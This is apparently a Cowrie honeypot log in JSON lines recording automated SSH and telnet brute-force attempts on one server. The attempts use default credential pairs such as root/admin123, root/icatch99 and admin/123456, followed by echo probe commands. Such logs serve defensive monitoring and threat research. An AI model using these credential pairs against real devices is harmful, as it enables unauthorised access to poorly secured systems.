{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:27:35.500542Z","src_ip":"212.227.235.229","session":"14ea03038cd8"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:27:35.501207Z","src_ip":"212.227.235.229","session":"14ea03038cd8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:35.990815Z","src_ip":"212.227.235.229","session":"14ea03038cd8"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:35.992101Z","src_ip":"212.227.235.229","session":"14ea03038cd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43070,"dst_ip":"1.2.3.4","dst_port":22,"session":"6232ade03eb3","protocol":"ssh","message":"New connection: 212.227.235.229:43070 (1.2.3.4:22) [session: 6232ade03eb3]","sensor":"my-vps","timestamp":"2025-08-26T08:27:36.102251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:36.447278Z","src_ip":"212.227.235.229","session":"6232ade03eb3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:36.448402Z","src_ip":"212.227.235.229","session":"6232ade03eb3"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:27:38.850754Z","src_ip":"212.227.235.229","session":"6232ade03eb3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:27:40.398566Z","src_ip":"212.227.235.229","session":"6232ade03eb3"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:27:40.399283Z","src_ip":"212.227.235.229","session":"6232ade03eb3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:40.714422Z","src_ip":"212.227.235.229","session":"6232ade03eb3"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:40.715580Z","src_ip":"212.227.235.229","session":"6232ade03eb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36452,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfaa5677a5ec","protocol":"ssh","message":"New connection: 212.227.235.229:36452 (1.2.3.4:22) [session: cfaa5677a5ec]","sensor":"my-vps","timestamp":"2025-08-26T08:27:40.815666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:41.098735Z","src_ip":"212.227.235.229","session":"cfaa5677a5ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:41.099418Z","src_ip":"212.227.235.229","session":"cfaa5677a5ec"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T08:27:42.798036Z","src_ip":"212.227.235.229","session":"cfaa5677a5ec"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:45.144928Z","src_ip":"212.227.235.229","session":"cfaa5677a5ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56104,"dst_ip":"1.2.3.4","dst_port":22,"session":"758df45f7c72","protocol":"ssh","message":"New connection: 212.227.235.229:56104 (1.2.3.4:22) [session: 758df45f7c72]","sensor":"my-vps","timestamp":"2025-08-26T08:27:45.236917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:45.745255Z","src_ip":"212.227.235.229","session":"758df45f7c72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:45.745939Z","src_ip":"212.227.235.229","session":"758df45f7c72"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T08:27:47.960502Z","src_ip":"212.227.235.229","session":"758df45f7c72"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:49.327617Z","src_ip":"212.227.235.229","session":"758df45f7c72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44252,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b5a394c4a6a","protocol":"ssh","message":"New connection: 212.227.235.229:44252 (1.2.3.4:22) [session: 4b5a394c4a6a]","sensor":"my-vps","timestamp":"2025-08-26T08:27:49.495950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:49.881879Z","src_ip":"212.227.235.229","session":"4b5a394c4a6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:49.882575Z","src_ip":"212.227.235.229","session":"4b5a394c4a6a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T08:27:52.013821Z","src_ip":"212.227.235.229","session":"4b5a394c4a6a"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:53.494188Z","src_ip":"212.227.235.229","session":"4b5a394c4a6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33544,"dst_ip":"1.2.3.4","dst_port":22,"session":"886a96397dc6","protocol":"ssh","message":"New connection: 212.227.235.229:33544 (1.2.3.4:22) [session: 886a96397dc6]","sensor":"my-vps","timestamp":"2025-08-26T08:27:53.618684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:53.885850Z","src_ip":"212.227.235.229","session":"886a96397dc6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:53.886539Z","src_ip":"212.227.235.229","session":"886a96397dc6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T08:27:55.833869Z","src_ip":"212.227.235.229","session":"886a96397dc6"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:58.207781Z","src_ip":"212.227.235.229","session":"886a96397dc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54600,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f61b66c3fb","protocol":"ssh","message":"New connection: 212.227.235.229:54600 (1.2.3.4:22) [session: c7f61b66c3fb]","sensor":"my-vps","timestamp":"2025-08-26T08:27:58.297326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:27:58.401372Z","src_ip":"212.227.235.229","session":"c7f61b66c3fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:27:58.403506Z","src_ip":"212.227.235.229","session":"c7f61b66c3fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:00.331722Z","src_ip":"212.227.235.229","session":"c7f61b66c3fb"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.193","src_port":56196,"dst_ip":"1.2.3.4","dst_port":23,"session":"6e564b0f531f","protocol":"telnet","message":"New connection: 156.244.14.193:56196 (1.2.3.4:23) [session: 6e564b0f531f]","sensor":"my-vps","timestamp":"2025-08-26T08:28:00.659577Z"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:02.043184Z","src_ip":"212.227.235.229","session":"c7f61b66c3fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43594,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc589a1b2403","protocol":"ssh","message":"New connection: 212.227.235.229:43594 (1.2.3.4:22) [session: fc589a1b2403]","sensor":"my-vps","timestamp":"2025-08-26T08:28:02.155437Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:02.470783Z","src_ip":"156.244.14.193","session":"6e564b0f531f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:02.719939Z","src_ip":"212.227.235.229","session":"fc589a1b2403"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:02.720575Z","src_ip":"212.227.235.229","session":"fc589a1b2403"}
{"eventid":"cowrie.session.closed","duration":4.076025724411011,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:04.735526Z","src_ip":"156.244.14.193","session":"6e564b0f531f"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.193","src_port":34276,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e6d0da714aa","protocol":"telnet","message":"New connection: 156.244.14.193:34276 (1.2.3.4:23) [session: 5e6d0da714aa]","sensor":"my-vps","timestamp":"2025-08-26T08:28:04.890513Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:05.159016Z","src_ip":"212.227.235.229","session":"fc589a1b2403"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:06.319669Z","src_ip":"212.227.235.229","session":"fc589a1b2403"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59244,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bc989d87042","protocol":"ssh","message":"New connection: 212.227.235.229:59244 (1.2.3.4:22) [session: 7bc989d87042]","sensor":"my-vps","timestamp":"2025-08-26T08:28:06.421414Z"}
{"eventid":"cowrie.session.closed","duration":1.5557928085327148,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:06.446232Z","src_ip":"156.244.14.193","session":"5e6d0da714aa"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:06.517048Z","src_ip":"212.227.235.229","session":"7bc989d87042"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:28:06.517648Z","src_ip":"212.227.235.229","session":"7bc989d87042"}
{"eventid":"cowrie.session.connect","src_ip":"156.244.14.193","src_port":34286,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f8c7fe2dd41","protocol":"telnet","message":"New connection: 156.244.14.193:34286 (1.2.3.4:23) [session: 5f8c7fe2dd41]","sensor":"my-vps","timestamp":"2025-08-26T08:28:06.598354Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:28:07.940078Z","src_ip":"156.244.14.193","session":"5f8c7fe2dd41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:28:07.959222Z","src_ip":"156.244.14.193","session":"5f8c7fe2dd41"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T08:28:08.104554Z","src_ip":"212.227.235.229","session":"7bc989d87042"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T08:28:08.216648Z","src_ip":"156.244.14.193","session":"5f8c7fe2dd41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:09.464353Z","src_ip":"156.244.14.193","session":"5f8c7fe2dd41"}
{"eventid":"cowrie.session.closed","duration":2.870568037033081,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:09.468842Z","src_ip":"156.244.14.193","session":"5f8c7fe2dd41"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:28:09.483882Z","src_ip":"212.227.235.229","session":"7bc989d87042"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45980,"dst_ip":"1.2.3.4","dst_port":22,"session":"edd3bb986918","protocol":"ssh","message":"New connection: 212.227.235.229:45980 (1.2.3.4:22) [session: edd3bb986918]","sensor":"my-vps","timestamp":"2025-08-26T08:28:09.594390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:28:10.044837Z","src_ip":"212.227.235.229","session":"edd3bb986918"}
